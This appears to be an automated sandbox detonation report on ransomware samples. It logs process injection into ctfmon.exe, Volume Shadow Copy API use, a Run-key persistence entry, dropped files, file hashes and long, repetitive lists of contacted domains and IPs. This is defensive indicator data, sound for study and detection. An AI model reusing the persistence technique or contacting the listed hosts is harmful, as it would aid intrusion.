PID 1628 wrote to memory of 2332 N/A C:\Users\Admin\AppData\Local\Temp\F45F47EDCED7FAC5A99C45AB4B8C2D54.exe C:\Windows\SysWOW64\ctfmon.exe
PID 1628 wrote to memory of 2332 N/A C:\Users\Admin\AppData\Local\Temp\F45F47EDCED7FAC5A99C45AB4B8C2D54.exe C:\Windows\SysWOW64\ctfmon.exe
PID 1628 wrote to memory of 2332 N/A C:\Users\Admin\AppData\Local\Temp\F45F47EDCED7FAC5A99C45AB4B8C2D54.exe C:\Windows\SysWOW64\ctfmon.exe
PID 1628 wrote to memory of 2332 N/A C:\Users\Admin\AppData\Local\Temp\F45F47EDCED7FAC5A99C45AB4B8C2D54.exe C:\Windows\SysWOW64\ctfmon.exe
PID 1628 wrote to memory of 2332 N/A C:\Users\Admin\AppData\Local\Temp\F45F47EDCED7FAC5A99C45AB4B8C2D54.exe C:\Windows\SysWOW64\ctfmon.exe
PID 2332 wrote to memory of 2376 N/A C:\Windows\SysWOW64\ctfmon.exe C:\Users\Admin\AppData\Local\Temp\ywicmnfzby.$00.exe
PID 2332 wrote to memory of 2376 N/A C:\Windows\SysWOW64\ctfmon.exe C:\Users\Admin\AppData\Local\Temp\ywicmnfzby.$00.exe
PID 2332 wrote to memory of 2376 N/A C:\Windows\SysWOW64\ctfmon.exe C:\Users\Admin\AppData\Local\Temp\ywicmnfzby.$00.exe
PID 2332 wrote to memory of 2376 N/A C:\Windows\SysWOW64\ctfmon.exe C:\Users\Admin\AppData\Local\Temp\ywicmnfzby.$00.exe
PID 2376 wrote to memory of 1900 N/A C:\Users\Admin\AppData\Local\Temp\ywicmnfzby.$00.exe C:\Windows\SysWOW64\ctfmon.exe
PID 2376 wrote to memory of 1900 N/A C:\Users\Admin\AppData\Local\Temp\ywicmnfzby.$00.exe C:\Windows\SysWOW64\ctfmon.exe
PID 2376 wrote to memory of 1900 N/A C:\Users\Admin\AppData\Local\Temp\ywicmnfzby.$00.exe C:\Windows\SysWOW64\ctfmon.exe
PID 2376 wrote to memory of 1900 N/A C:\Users\Admin\AppData\Local\Temp\ywicmnfzby.$00.exe C:\Windows\SysWOW64\ctfmon.exe
PID 2376 wrote to memory of 1900 N/A C:\Users\Admin\AppData\Local\Temp\ywicmnfzby.$00.exe C:\Windows\SysWOW64\ctfmon.exe

Uses Volume Shadow Copy service COM API

ransomware

Processes

C:\Users\Admin\AppData\Local\Temp\F45F47EDCED7FAC5A99C45AB4B8C2D54.exe

"C:\Users\Admin\AppData\Local\Temp\F45F47EDCED7FAC5A99C45AB4B8C2D54.exe"

C:\Windows\SysWOW64\ctfmon.exe

ctfmon.exe

C:\Users\Admin\AppData\Local\Temp\ywicmnfzby.$00.exe

C:\Users\Admin\AppData\Local\Temp\ywicmnfzby.$00.exe

C:\Windows\SysWOW64\ctfmon.exe

ctfmon.exe

C:\Windows\system32\vssvc.exe

C:\Windows\system32\vssvc.exe

Network

Country Destination Domain Proto
US 8.8.8.8:53 397110121001i83455512377.com udp

Files

memory/1628-2-0x0000000000400000-0x0000000000416000-memory.dmp

memory/1628-1-0x0000000000240000-0x0000000000256000-memory.dmp

memory/1628-0-0x0000000000400000-0x0000000000416000-memory.dmp

memory/1628-6-0x0000000000400000-0x0000000000416000-memory.dmp

memory/2332-4-0x000000007EFA0000-0x000000007EFAF000-memory.dmp

memory/2332-3-0x000000007EFA0000-0x000000007EFAF000-memory.dmp

memory/2332-7-0x000000007EFA0000-0x000000007EFAF000-memory.dmp

\Users\Admin\AppData\Local\Temp\ywicmnfzby.$00.exe

MD5 f45f47edced7fac5a99c45ab4b8c2d54
SHA1 9060189dd95635c5f75d7f91c9bd345200e83028
SHA256 0529cdbc893fee664d3ac540b1e41e184797e0770808254058fc21de0a10b6c8
SHA512 ecf1ae299d0525f86b8c398d06b429164a10d6552caf08710567680ba670bc0c918bfff1807214b33a177202cbe8eeeeffa1396b91e697aed4da91fe81f523d3

memory/2332-17-0x000000007EFA0000-0x000000007EFAF000-memory.dmp

memory/2376-19-0x0000000000400000-0x0000000000416000-memory.dmp

memory/2376-18-0x0000000000260000-0x0000000000276000-memory.dmp

memory/1900-22-0x000000007EFA0000-0x000000007EFAF000-memory.dmp

memory/2376-23-0x0000000000400000-0x0000000000416000-memory.dmp

memory/2376-24-0x0000000000260000-0x0000000000276000-memory.dmp

memory/1900-25-0x000000007EFA0000-0x000000007EFAF000-memory.dmp

memory/1900-26-0x000000007EFA0000-0x000000007EFAF000-memory.dmp

memory/1900-30-0x000000007EFA0000-0x000000007EFAF000-memory.dmp

Analysis: behavioral8

Detonation Overview

Submitted

2024-11-22 03:25

Reported

2024-11-22 14:10

Platform

win7-20240903-en

Max time kernel

598s

Max time network

600s

Command Line

"C:\Users\Admin\AppData\Local\Temp\decrypt_0000000000000020-000A0000.exe"

Signatures

Adds Run key to start application

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\pr = "C:\\Program Files (x86)\\decrypt_0000000000000020-000A0000.exe" C:\Users\Admin\AppData\Local\Temp\decrypt_0000000000000020-000A0000.exe N/A

Drops file in Program Files directory

Description Indicator Process Target
File created C:\Program Files (x86)\CIVQWTJLSD.BBF C:\Users\Admin\AppData\Local\Temp\decrypt_0000000000000020-000A0000.exe N/A
File opened for modification C:\Program Files (x86)\CIVQWTJLSD.BBF C:\Users\Admin\AppData\Local\Temp\decrypt_0000000000000020-000A0000.exe N/A
File created C:\Program Files (x86)\decrypt_0000000000000020-000A0000.exe C:\Users\Admin\AppData\Local\Temp\decrypt_0000000000000020-000A0000.exe N/A
File opened for modification C:\Program Files (x86)\decrypt_0000000000000020-000A0000.exe C:\Users\Admin\AppData\Local\Temp\decrypt_0000000000000020-000A0000.exe N/A

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\decrypt_0000000000000020-000A0000.exe N/A

Processes

C:\Users\Admin\AppData\Local\Temp\decrypt_0000000000000020-000A0000.exe

"C:\Users\Admin\AppData\Local\Temp\decrypt_0000000000000020-000A0000.exe"

Network

Country Destination Domain Proto
US 8.8.8.8:53 decimallightness.com udp
US 8.8.8.8:53 craigslistlasvegascars.com udp
US 8.8.8.8:53 deenislam.org udp
HK 34.92.46.178:80 deenislam.org tcp
US 8.8.8.8:53 dentistinnicaragua.com udp
US 8.8.8.8:53 dedhamfoodpantry.org udp
US 192.124.249.157:80 dedhamfoodpantry.org tcp
HK 34.92.46.178:80 deenislam.org tcp
US 192.124.249.157:80 dedhamfoodpantry.org tcp
HK 34.92.46.178:80 deenislam.org tcp
US 192.124.249.157:80 dedhamfoodpantry.org tcp
HK 34.92.46.178:80 deenislam.org tcp
US 192.124.249.157:80 dedhamfoodpantry.org tcp
HK 34.92.46.178:80 deenislam.org tcp
US 192.124.249.157:80 dedhamfoodpantry.org tcp
HK 34.92.46.178:80 deenislam.org tcp
US 192.124.249.157:80 dedhamfoodpantry.org tcp
HK 34.92.46.178:80 deenislam.org tcp
US 192.124.249.157:80 dedhamfoodpantry.org tcp
HK 34.92.46.178:80 deenislam.org tcp
US 192.124.249.157:80 dedhamfoodpantry.org tcp
HK 34.92.46.178:80 deenislam.org tcp
US 192.124.249.157:80 dedhamfoodpantry.org tcp
HK 34.92.46.178:80 deenislam.org tcp
US 192.124.249.157:80 dedhamfoodpantry.org tcp
HK 34.92.46.178:80 deenislam.org tcp
US 192.124.249.157:80 dedhamfoodpantry.org tcp
HK 34.92.46.178:80 deenislam.org tcp
US 192.124.249.157:80 dedhamfoodpantry.org tcp
HK 34.92.46.178:80 deenislam.org tcp
US 192.124.249.157:80 dedhamfoodpantry.org tcp
HK 34.92.46.178:80 deenislam.org tcp
US 192.124.249.157:80 dedhamfoodpantry.org tcp
HK 34.92.46.178:80 deenislam.org tcp
US 192.124.249.157:80 dedhamfoodpantry.org tcp
HK 34.92.46.178:80 deenislam.org tcp
US 192.124.249.157:80 dedhamfoodpantry.org tcp
HK 34.92.46.178:80 deenislam.org tcp
US 192.124.249.157:80 dedhamfoodpantry.org tcp
HK 34.92.46.178:80 deenislam.org tcp
US 192.124.249.157:80 dedhamfoodpantry.org tcp
HK 34.92.46.178:80 deenislam.org tcp
US 192.124.249.157:80 dedhamfoodpantry.org tcp
HK 34.92.46.178:80 deenislam.org tcp
US 192.124.249.157:80 dedhamfoodpantry.org tcp
HK 34.92.46.178:80 deenislam.org tcp
US 192.124.249.157:80 dedhamfoodpantry.org tcp
HK 34.92.46.178:80 deenislam.org tcp
US 192.124.249.157:80 dedhamfoodpantry.org tcp
HK 34.92.46.178:80 deenislam.org tcp
US 192.124.249.157:80 dedhamfoodpantry.org tcp
HK 34.92.46.178:80 deenislam.org tcp
US 192.124.249.157:80 dedhamfoodpantry.org tcp
HK 34.92.46.178:80 deenislam.org tcp
US 192.124.249.157:80 dedhamfoodpantry.org tcp
HK 34.92.46.178:80 deenislam.org tcp
US 192.124.249.157:80 dedhamfoodpantry.org tcp
HK 34.92.46.178:80 deenislam.org tcp
US 192.124.249.157:80 dedhamfoodpantry.org tcp
HK 34.92.46.178:80 deenislam.org tcp
US 192.124.249.157:80 dedhamfoodpantry.org tcp
HK 34.92.46.178:80 deenislam.org tcp
US 192.124.249.157:80 dedhamfoodpantry.org tcp
HK 34.92.46.178:80 deenislam.org tcp
US 192.124.249.157:80 dedhamfoodpantry.org tcp
HK 34.92.46.178:80 deenislam.org tcp
US 192.124.249.157:80 dedhamfoodpantry.org tcp
HK 34.92.46.178:80 deenislam.org tcp
US 192.124.249.157:80 dedhamfoodpantry.org tcp
HK 34.92.46.178:80 deenislam.org tcp
US 192.124.249.157:80 dedhamfoodpantry.org tcp
HK 34.92.46.178:80 deenislam.org tcp
US 192.124.249.157:80 dedhamfoodpantry.org tcp
HK 34.92.46.178:80 deenislam.org tcp
US 192.124.249.157:80 dedhamfoodpantry.org tcp
HK 34.92.46.178:80 deenislam.org tcp
US 192.124.249.157:80 dedhamfoodpantry.org tcp
HK 34.92.46.178:80 deenislam.org tcp
US 192.124.249.157:80 dedhamfoodpantry.org tcp
HK 34.92.46.178:80 deenislam.org tcp
US 192.124.249.157:80 dedhamfoodpantry.org tcp
HK 34.92.46.178:80 deenislam.org tcp
US 192.124.249.157:80 dedhamfoodpantry.org tcp
HK 34.92.46.178:80 deenislam.org tcp
US 192.124.249.157:80 dedhamfoodpantry.org tcp
HK 34.92.46.178:80 deenislam.org tcp
US 192.124.249.157:80 dedhamfoodpantry.org tcp
HK 34.92.46.178:80 deenislam.org tcp
US 192.124.249.157:80 dedhamfoodpantry.org tcp
HK 34.92.46.178:80 deenislam.org tcp
US 192.124.249.157:80 dedhamfoodpantry.org tcp
HK 34.92.46.178:80 deenislam.org tcp
US 192.124.249.157:80 dedhamfoodpantry.org tcp
HK 34.92.46.178:80 deenislam.org tcp
US 192.124.249.157:80 dedhamfoodpantry.org tcp
HK 34.92.46.178:80 deenislam.org tcp
US 192.124.249.157:80 dedhamfoodpantry.org tcp
HK 34.92.46.178:80 deenislam.org tcp
US 192.124.249.157:80 dedhamfoodpantry.org tcp
HK 34.92.46.178:80 deenislam.org tcp
US 192.124.249.157:80 dedhamfoodpantry.org tcp
HK 34.92.46.178:80 deenislam.org tcp
US 192.124.249.157:80 dedhamfoodpantry.org tcp
HK 34.92.46.178:80 deenislam.org tcp
US 192.124.249.157:80 dedhamfoodpantry.org tcp
HK 34.92.46.178:80 deenislam.org tcp
US 192.124.249.157:80 dedhamfoodpantry.org tcp
HK 34.92.46.178:80 deenislam.org tcp
US 192.124.249.157:80 dedhamfoodpantry.org tcp
HK 34.92.46.178:80 deenislam.org tcp
US 192.124.249.157:80 dedhamfoodpantry.org tcp
HK 34.92.46.178:80 deenislam.org tcp
US 192.124.249.157:80 dedhamfoodpantry.org tcp
HK 34.92.46.178:80 deenislam.org tcp
US 192.124.249.157:80 dedhamfoodpantry.org tcp
HK 34.92.46.178:80 deenislam.org tcp
US 192.124.249.157:80 dedhamfoodpantry.org tcp
HK 34.92.46.178:80 deenislam.org tcp
US 192.124.249.157:80 dedhamfoodpantry.org tcp
HK 34.92.46.178:80 deenislam.org tcp
US 192.124.249.157:80 dedhamfoodpantry.org tcp
HK 34.92.46.178:80 deenislam.org tcp
US 192.124.249.157:80 dedhamfoodpantry.org tcp
HK 34.92.46.178:80 deenislam.org tcp
US 192.124.249.157:80 dedhamfoodpantry.org tcp
HK 34.92.46.178:80 deenislam.org tcp
US 192.124.249.157:80 dedhamfoodpantry.org tcp
HK 34.92.46.178:80 deenislam.org tcp
US 192.124.249.157:80 dedhamfoodpantry.org tcp
HK 34.92.46.178:80 deenislam.org tcp
US 192.124.249.157:80 dedhamfoodpantry.org tcp
HK 34.92.46.178:80 deenislam.org tcp
US 192.124.249.157:80 dedhamfoodpantry.org tcp
HK 34.92.46.178:80 deenislam.org tcp
US 192.124.249.157:80 dedhamfoodpantry.org tcp
HK 34.92.46.178:80 deenislam.org tcp
US 192.124.249.157:80 dedhamfoodpantry.org tcp
HK 34.92.46.178:80 deenislam.org tcp
US 192.124.249.157:80 dedhamfoodpantry.org tcp
HK 34.92.46.178:80 deenislam.org tcp
US 192.124.249.157:80 dedhamfoodpantry.org tcp
HK 34.92.46.178:80 deenislam.org tcp
US 192.124.249.157:80 dedhamfoodpantry.org tcp
HK 34.92.46.178:80 deenislam.org tcp
US 192.124.249.157:80 dedhamfoodpantry.org tcp
HK 34.92.46.178:80 deenislam.org tcp
US 192.124.249.157:80 dedhamfoodpantry.org tcp
HK 34.92.46.178:80 deenislam.org tcp
US 192.124.249.157:80 dedhamfoodpantry.org tcp
HK 34.92.46.178:80 deenislam.org tcp
US 192.124.249.157:80 dedhamfoodpantry.org tcp
HK 34.92.46.178:80 deenislam.org tcp
US 192.124.249.157:80 dedhamfoodpantry.org tcp
HK 34.92.46.178:80 deenislam.org tcp
US 192.124.249.157:80 dedhamfoodpantry.org tcp
HK 34.92.46.178:80 deenislam.org tcp
US 192.124.249.157:80 dedhamfoodpantry.org tcp
HK 34.92.46.178:80 deenislam.org tcp
US 192.124.249.157:80 dedhamfoodpantry.org tcp
HK 34.92.46.178:80 deenislam.org tcp
US 192.124.249.157:80 dedhamfoodpantry.org tcp
HK 34.92.46.178:80 deenislam.org tcp
US 192.124.249.157:80 dedhamfoodpantry.org tcp
HK 34.92.46.178:80 deenislam.org tcp
US 192.124.249.157:80 dedhamfoodpantry.org tcp
HK 34.92.46.178:80 deenislam.org tcp
US 192.124.249.157:80 dedhamfoodpantry.org tcp
HK 34.92.46.178:80 deenislam.org tcp
US 192.124.249.157:80 dedhamfoodpantry.org tcp
HK 34.92.46.178:80 deenislam.org tcp
US 192.124.249.157:80 dedhamfoodpantry.org tcp
HK 34.92.46.178:80 deenislam.org tcp
US 192.124.249.157:80 dedhamfoodpantry.org tcp
HK 34.92.46.178:80 deenislam.org tcp
US 192.124.249.157:80 dedhamfoodpantry.org tcp
HK 34.92.46.178:80 deenislam.org tcp
US 192.124.249.157:80 dedhamfoodpantry.org tcp
HK 34.92.46.178:80 deenislam.org tcp
US 192.124.249.157:80 dedhamfoodpantry.org tcp
HK 34.92.46.178:80 deenislam.org tcp
US 192.124.249.157:80 dedhamfoodpantry.org tcp
HK 34.92.46.178:80 deenislam.org tcp
US 192.124.249.157:80 dedhamfoodpantry.org tcp
HK 34.92.46.178:80 deenislam.org tcp
US 192.124.249.157:80 dedhamfoodpantry.org tcp
HK 34.92.46.178:80 deenislam.org tcp
US 192.124.249.157:80 dedhamfoodpantry.org tcp
HK 34.92.46.178:80 deenislam.org tcp
US 192.124.249.157:80 dedhamfoodpantry.org tcp
HK 34.92.46.178:80 deenislam.org tcp
US 192.124.249.157:80 dedhamfoodpantry.org tcp
HK 34.92.46.178:80 deenislam.org tcp
US 192.124.249.157:80 dedhamfoodpantry.org tcp
HK 34.92.46.178:80 deenislam.org tcp
US 192.124.249.157:80 dedhamfoodpantry.org tcp
HK 34.92.46.178:80 deenislam.org tcp
US 192.124.249.157:80 dedhamfoodpantry.org tcp
HK 34.92.46.178:80 deenislam.org tcp
US 192.124.249.157:80 dedhamfoodpantry.org tcp
HK 34.92.46.178:80 deenislam.org tcp
US 192.124.249.157:80 dedhamfoodpantry.org tcp
HK 34.92.46.178:80 deenislam.org tcp
US 192.124.249.157:80 dedhamfoodpantry.org tcp
HK 34.92.46.178:80 deenislam.org tcp
US 192.124.249.157:80 dedhamfoodpantry.org tcp
HK 34.92.46.178:80 deenislam.org tcp
US 192.124.249.157:80 dedhamfoodpantry.org tcp
HK 34.92.46.178:80 deenislam.org tcp
US 192.124.249.157:80 dedhamfoodpantry.org tcp
HK 34.92.46.178:80 deenislam.org tcp
US 192.124.249.157:80 dedhamfoodpantry.org tcp
HK 34.92.46.178:80 deenislam.org tcp
US 192.124.249.157:80 dedhamfoodpantry.org tcp
HK 34.92.46.178:80 deenislam.org tcp
US 192.124.249.157:80 dedhamfoodpantry.org tcp
HK 34.92.46.178:80 deenislam.org tcp
US 192.124.249.157:80 dedhamfoodpantry.org tcp
HK 34.92.46.178:80 deenislam.org tcp
US 192.124.249.157:80 dedhamfoodpantry.org tcp
HK 34.92.46.178:80 deenislam.org tcp
US 192.124.249.157:80 dedhamfoodpantry.org tcp
HK 34.92.46.178:80 deenislam.org tcp
US 192.124.249.157:80 dedhamfoodpantry.org tcp
HK 34.92.46.178:80 deenislam.org tcp
US 192.124.249.157:80 dedhamfoodpantry.org tcp
HK 34.92.46.178:80 deenislam.org tcp
US 192.124.249.157:80 dedhamfoodpantry.org tcp
HK 34.92.46.178:80 deenislam.org tcp
US 192.124.249.157:80 dedhamfoodpantry.org tcp
HK 34.92.46.178:80 deenislam.org tcp
US 192.124.249.157:80 dedhamfoodpantry.org tcp
HK 34.92.46.178:80 deenislam.org tcp
US 192.124.249.157:80 dedhamfoodpantry.org tcp
HK 34.92.46.178:80 deenislam.org tcp
US 192.124.249.157:80 dedhamfoodpantry.org tcp
HK 34.92.46.178:80 deenislam.org tcp
US 192.124.249.157:80 dedhamfoodpantry.org tcp
HK 34.92.46.178:80 deenislam.org tcp
US 192.124.249.157:80 dedhamfoodpantry.org tcp
HK 34.92.46.178:80 deenislam.org tcp
US 192.124.249.157:80 dedhamfoodpantry.org tcp
HK 34.92.46.178:80 deenislam.org tcp
US 192.124.249.157:80 dedhamfoodpantry.org tcp
HK 34.92.46.178:80 deenislam.org tcp
US 192.124.249.157:80 dedhamfoodpantry.org tcp
HK 34.92.46.178:80 deenislam.org tcp
US 192.124.249.157:80 dedhamfoodpantry.org tcp
HK 34.92.46.178:80 deenislam.org tcp
US 192.124.249.157:80 dedhamfoodpantry.org tcp
HK 34.92.46.178:80 deenislam.org tcp
US 192.124.249.157:80 dedhamfoodpantry.org tcp
HK 34.92.46.178:80 deenislam.org tcp
US 192.124.249.157:80 dedhamfoodpantry.org tcp
HK 34.92.46.178:80 deenislam.org tcp
US 192.124.249.157:80 dedhamfoodpantry.org tcp
HK 34.92.46.178:80 deenislam.org tcp
US 192.124.249.157:80 dedhamfoodpantry.org tcp
HK 34.92.46.178:80 deenislam.org tcp
US 192.124.249.157:80 dedhamfoodpantry.org tcp
HK 34.92.46.178:80 deenislam.org tcp
US 192.124.249.157:80 dedhamfoodpantry.org tcp
HK 34.92.46.178:80 deenislam.org tcp
US 192.124.249.157:80 dedhamfoodpantry.org tcp
HK 34.92.46.178:80 deenislam.org tcp
US 192.124.249.157:80 dedhamfoodpantry.org tcp
HK 34.92.46.178:80 deenislam.org tcp
US 192.124.249.157:80 dedhamfoodpantry.org tcp
HK 34.92.46.178:80 deenislam.org tcp
US 192.124.249.157:80 dedhamfoodpantry.org tcp
HK 34.92.46.178:80 deenislam.org tcp
US 192.124.249.157:80 dedhamfoodpantry.org tcp
HK 34.92.46.178:80 deenislam.org tcp
US 192.124.249.157:80 dedhamfoodpantry.org tcp
HK 34.92.46.178:80 deenislam.org tcp
US 192.124.249.157:80 dedhamfoodpantry.org tcp
HK 34.92.46.178:80 deenislam.org tcp
US 192.124.249.157:80 dedhamfoodpantry.org tcp
HK 34.92.46.178:80 deenislam.org tcp
US 192.124.249.157:80 dedhamfoodpantry.org tcp
HK 34.92.46.178:80 deenislam.org tcp
US 192.124.249.157:80 dedhamfoodpantry.org tcp
HK 34.92.46.178:80 deenislam.org tcp
US 192.124.249.157:80 dedhamfoodpantry.org tcp
HK 34.92.46.178:80 deenislam.org tcp
US 192.124.249.157:80 dedhamfoodpantry.org tcp
HK 34.92.46.178:80 deenislam.org tcp
US 192.124.249.157:80 dedhamfoodpantry.org tcp
HK 34.92.46.178:80 deenislam.org tcp
US 192.124.249.157:80 dedhamfoodpantry.org tcp
HK 34.92.46.178:80 deenislam.org tcp
US 192.124.249.157:80 dedhamfoodpantry.org tcp
HK 34.92.46.178:80 deenislam.org tcp
US 192.124.249.157:80 dedhamfoodpantry.org tcp
HK 34.92.46.178:80 deenislam.org tcp
US 192.124.249.157:80 dedhamfoodpantry.org tcp
HK 34.92.46.178:80 deenislam.org tcp
US 192.124.249.157:80 dedhamfoodpantry.org tcp
HK 34.92.46.178:80 deenislam.org tcp
US 192.124.249.157:80 dedhamfoodpantry.org tcp
HK 34.92.46.178:80 deenislam.org tcp
US 192.124.249.157:80 dedhamfoodpantry.org tcp
HK 34.92.46.178:80 deenislam.org tcp
US 192.124.249.157:80 dedhamfoodpantry.org tcp
HK 34.92.46.178:80 deenislam.org tcp
US 192.124.249.157:80 dedhamfoodpantry.org tcp
HK 34.92.46.178:80 deenislam.org tcp
US 192.124.249.157:80 dedhamfoodpantry.org tcp
HK 34.92.46.178:80 deenislam.org tcp
US 192.124.249.157:80 dedhamfoodpantry.org tcp
HK 34.92.46.178:80 deenislam.org tcp
US 192.124.249.157:80 dedhamfoodpantry.org tcp
HK 34.92.46.178:80 deenislam.org tcp
US 192.124.249.157:80 dedhamfoodpantry.org tcp
HK 34.92.46.178:80 deenislam.org tcp
US 192.124.249.157:80 dedhamfoodpantry.org tcp
HK 34.92.46.178:80 deenislam.org tcp
US 192.124.249.157:80 dedhamfoodpantry.org tcp
HK 34.92.46.178:80 deenislam.org tcp
US 192.124.249.157:80 dedhamfoodpantry.org tcp
HK 34.92.46.178:80 deenislam.org tcp
US 192.124.249.157:80 dedhamfoodpantry.org tcp
HK 34.92.46.178:80 deenislam.org tcp
US 192.124.249.157:80 dedhamfoodpantry.org tcp
HK 34.92.46.178:80 deenislam.org tcp
US 192.124.249.157:80 dedhamfoodpantry.org tcp
HK 34.92.46.178:80 deenislam.org tcp
US 192.124.249.157:80 dedhamfoodpantry.org tcp
HK 34.92.46.178:80 deenislam.org tcp
US 192.124.249.157:80 dedhamfoodpantry.org tcp
HK 34.92.46.178:80 deenislam.org tcp
US 192.124.249.157:80 dedhamfoodpantry.org tcp
HK 34.92.46.178:80 deenislam.org tcp
US 192.124.249.157:80 dedhamfoodpantry.org tcp
HK 34.92.46.178:80 deenislam.org tcp
US 192.124.249.157:80 dedhamfoodpantry.org tcp
HK 34.92.46.178:80 deenislam.org tcp
US 192.124.249.157:80 dedhamfoodpantry.org tcp
HK 34.92.46.178:80 deenislam.org tcp
US 192.124.249.157:80 dedhamfoodpantry.org tcp
HK 34.92.46.178:80 deenislam.org tcp
US 192.124.249.157:80 dedhamfoodpantry.org tcp
HK 34.92.46.178:80 deenislam.org tcp
US 192.124.249.157:80 dedhamfoodpantry.org tcp
HK 34.92.46.178:80 deenislam.org tcp
US 192.124.249.157:80 dedhamfoodpantry.org tcp
HK 34.92.46.178:80 deenislam.org tcp
US 192.124.249.157:80 dedhamfoodpantry.org tcp
HK 34.92.46.178:80 deenislam.org tcp
US 192.124.249.157:80 dedhamfoodpantry.org tcp
HK 34.92.46.178:80 deenislam.org tcp
US 192.124.249.157:80 dedhamfoodpantry.org tcp
HK 34.92.46.178:80 deenislam.org tcp
US 192.124.249.157:80 dedhamfoodpantry.org tcp
HK 34.92.46.178:80 deenislam.org tcp
US 192.124.249.157:80 dedhamfoodpantry.org tcp
HK 34.92.46.178:80 deenislam.org tcp
US 192.124.249.157:80 dedhamfoodpantry.org tcp
HK 34.92.46.178:80 deenislam.org tcp
US 192.124.249.157:80 dedhamfoodpantry.org tcp
HK 34.92.46.178:80 deenislam.org tcp
US 192.124.249.157:80 dedhamfoodpantry.org tcp
HK 34.92.46.178:80 deenislam.org tcp
US 192.124.249.157:80 dedhamfoodpantry.org tcp
HK 34.92.46.178:80 deenislam.org tcp
US 192.124.249.157:80 dedhamfoodpantry.org tcp
HK 34.92.46.178:80 deenislam.org tcp
US 192.124.249.157:80 dedhamfoodpantry.org tcp
HK 34.92.46.178:80 deenislam.org tcp
US 192.124.249.157:80 dedhamfoodpantry.org tcp
HK 34.92.46.178:80 deenislam.org tcp
US 192.124.249.157:80 dedhamfoodpantry.org tcp
HK 34.92.46.178:80 deenislam.org tcp
US 192.124.249.157:80 dedhamfoodpantry.org tcp
HK 34.92.46.178:80 deenislam.org tcp
US 192.124.249.157:80 dedhamfoodpantry.org tcp
HK 34.92.46.178:80 deenislam.org tcp
US 192.124.249.157:80 dedhamfoodpantry.org tcp
HK 34.92.46.178:80 deenislam.org tcp
US 192.124.249.157:80 dedhamfoodpantry.org tcp
HK 34.92.46.178:80 deenislam.org tcp
US 192.124.249.157:80 dedhamfoodpantry.org tcp
HK 34.92.46.178:80 deenislam.org tcp
US 192.124.249.157:80 dedhamfoodpantry.org tcp
HK 34.92.46.178:80 deenislam.org tcp
US 192.124.249.157:80 dedhamfoodpantry.org tcp
HK 34.92.46.178:80 deenislam.org tcp
US 192.124.249.157:80 dedhamfoodpantry.org tcp
HK 34.92.46.178:80 deenislam.org tcp
US 192.124.249.157:80 dedhamfoodpantry.org tcp
HK 34.92.46.178:80 deenislam.org tcp
US 192.124.249.157:80 dedhamfoodpantry.org tcp
HK 34.92.46.178:80 deenislam.org tcp
US 192.124.249.157:80 dedhamfoodpantry.org tcp
HK 34.92.46.178:80 deenislam.org tcp
US 192.124.249.157:80 dedhamfoodpantry.org tcp
HK 34.92.46.178:80 deenislam.org tcp
US 192.124.249.157:80 dedhamfoodpantry.org tcp
HK 34.92.46.178:80 deenislam.org tcp
US 192.124.249.157:80 dedhamfoodpantry.org tcp
HK 34.92.46.178:80 deenislam.org tcp
US 192.124.249.157:80 dedhamfoodpantry.org tcp
HK 34.92.46.178:80 deenislam.org tcp
US 192.124.249.157:80 dedhamfoodpantry.org tcp
HK 34.92.46.178:80 deenislam.org tcp
US 192.124.249.157:80 dedhamfoodpantry.org tcp
HK 34.92.46.178:80 deenislam.org tcp
US 192.124.249.157:80 dedhamfoodpantry.org tcp
HK 34.92.46.178:80 deenislam.org tcp
US 192.124.249.157:80 dedhamfoodpantry.org tcp
HK 34.92.46.178:80 deenislam.org tcp
US 192.124.249.157:80 dedhamfoodpantry.org tcp
HK 34.92.46.178:80 deenislam.org tcp
US 192.124.249.157:80 dedhamfoodpantry.org tcp
HK 34.92.46.178:80 deenislam.org tcp
US 192.124.249.157:80 dedhamfoodpantry.org tcp
HK 34.92.46.178:80 deenislam.org tcp
US 192.124.249.157:80 dedhamfoodpantry.org tcp
HK 34.92.46.178:80 deenislam.org tcp
US 192.124.249.157:80 dedhamfoodpantry.org tcp
HK 34.92.46.178:80 deenislam.org tcp
US 192.124.249.157:80 dedhamfoodpantry.org tcp
HK 34.92.46.178:80 deenislam.org tcp
US 192.124.249.157:80 dedhamfoodpantry.org tcp
HK 34.92.46.178:80 deenislam.org tcp
US 192.124.249.157:80 dedhamfoodpantry.org tcp
HK 34.92.46.178:80 deenislam.org tcp
US 192.124.249.157:80 dedhamfoodpantry.org tcp
HK 34.92.46.178:80 deenislam.org tcp
US 192.124.249.157:80 dedhamfoodpantry.org tcp
HK 34.92.46.178:80 deenislam.org tcp
US 192.124.249.157:80 dedhamfoodpantry.org tcp
HK 34.92.46.178:80 deenislam.org tcp
US 192.124.249.157:80 dedhamfoodpantry.org tcp
HK 34.92.46.178:80 deenislam.org tcp
US 192.124.249.157:80 dedhamfoodpantry.org tcp
HK 34.92.46.178:80 deenislam.org tcp
US 192.124.249.157:80 dedhamfoodpantry.org tcp
HK 34.92.46.178:80 deenislam.org tcp
US 192.124.249.157:80 dedhamfoodpantry.org tcp
HK 34.92.46.178:80 deenislam.org tcp
US 192.124.249.157:80 dedhamfoodpantry.org tcp
HK 34.92.46.178:80 deenislam.org tcp
US 192.124.249.157:80 dedhamfoodpantry.org tcp
HK 34.92.46.178:80 deenislam.org tcp
US 192.124.249.157:80 dedhamfoodpantry.org tcp
HK 34.92.46.178:80 deenislam.org tcp
US 192.124.249.157:80 dedhamfoodpantry.org tcp
HK 34.92.46.178:80 deenislam.org tcp
US 192.124.249.157:80 dedhamfoodpantry.org tcp
HK 34.92.46.178:80 deenislam.org tcp
US 192.124.249.157:80 dedhamfoodpantry.org tcp
HK 34.92.46.178:80 deenislam.org tcp
US 192.124.249.157:80 dedhamfoodpantry.org tcp
HK 34.92.46.178:80 deenislam.org tcp
US 192.124.249.157:80 dedhamfoodpantry.org tcp
HK 34.92.46.178:80 deenislam.org tcp
US 192.124.249.157:80 dedhamfoodpantry.org tcp
HK 34.92.46.178:80 deenislam.org tcp
US 192.124.249.157:80 dedhamfoodpantry.org tcp
HK 34.92.46.178:80 deenislam.org tcp
US 192.124.249.157:80 dedhamfoodpantry.org tcp
HK 34.92.46.178:80 deenislam.org tcp
US 192.124.249.157:80 dedhamfoodpantry.org tcp
HK 34.92.46.178:80 deenislam.org tcp
US 192.124.249.157:80 dedhamfoodpantry.org tcp
